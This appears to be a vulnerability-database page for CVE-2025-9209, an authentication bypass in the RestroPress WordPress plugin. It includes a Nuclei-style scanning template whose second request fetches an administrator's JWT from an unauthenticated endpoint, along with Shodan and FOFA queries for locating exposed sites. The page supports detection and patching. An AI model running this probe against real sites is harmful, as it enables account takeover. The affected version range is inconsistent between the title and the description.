/Vulnerability Library

RestroPress 3.0.0-3.2.1 - Authentication Bypass

CVE-2025-9209
Verified

Description

RestroPress Online Food Ordering System WordPress plugin 3.0.0 to 3.1.9.2 contains an authentication bypass caused by exposure of user private tokens and API data via /wp-json/wp/v2/users endpoint, letting unauthenticated attackers forge JWT tokens and authenticate as other users including administrators, exploit requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

10%

Published Date

April 22, 2026

Template Author

0x_akoko

CVE-2025-9209.yaml
id: CVE-2025-9209

info:
  name: RestroPress 3.0.0-3.2.1 - Authentication Bypass
  author: 0x_Akoko
  severity: critical
  description: |
   RestroPress Online Food Ordering System WordPress plugin 3.0.0 to 3.1.9.2 contains an authentication bypass caused by exposure of user private tokens and API data via /wp-json/wp/v2/users endpoint, letting unauthenticated attackers forge JWT tokens and authenticate as other users including administrators, exploit requires no authentication.
  impact: |
   Unauthenticated attackers can forge JWT tokens and authenticate as any user, including administrators, leading to full account takeover.
  remediation: |
   Update to the latest version beyond 3.1.9.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress/restropress-online-food-ordering-system-300-3192-unauthenticated-information-exposure-to-authentication-bypass-via-forged-jwt
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9209
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-9209
    epss-score: 0.09621
    epss-percentile: 0.9299
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/wp-content/plugins/restropress/"
    fofa-query: body="/wp-content/plugins/restropress/"
  tags: cve,cve2025,wordpress,wp,wp-plugin,restropress,auth-bypass

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/restropress/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "RestroPress")'
          - 'compare_versions(version, ">= 3.0.0", "<= 3.2.1")'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - '(?i)Stable tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-json/rp/v1/auth?user_id=1 HTTP/1.1
        Host: {{Hostname}}
        Authorization: probe-{{randstr}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"token\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: jwt_token
        group: 1
        regex:
          - '"token"\s*:\s*"(eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)"'
# digest: 4a0a0047304502206dbcfc00fa46854e3ff7be927120d0286ee4dcf7b61760ae8e1e72e0fed45b75022100c82146318310e0a008c13f9cc562d42d2c8670364dc0a22c9e5bf41953ae6798:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-9209
CWE ID:
cwe-287

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress/restropress-online-food-ordering-system-300-3192-unauthenticated-information-exposure-to-authentication-bypass-via-forged-jwthttps://nvd.nist.gov/vuln/detail/CVE-2025-9209

Remediation Steps

Update to the latest version beyond 3.1.9.2.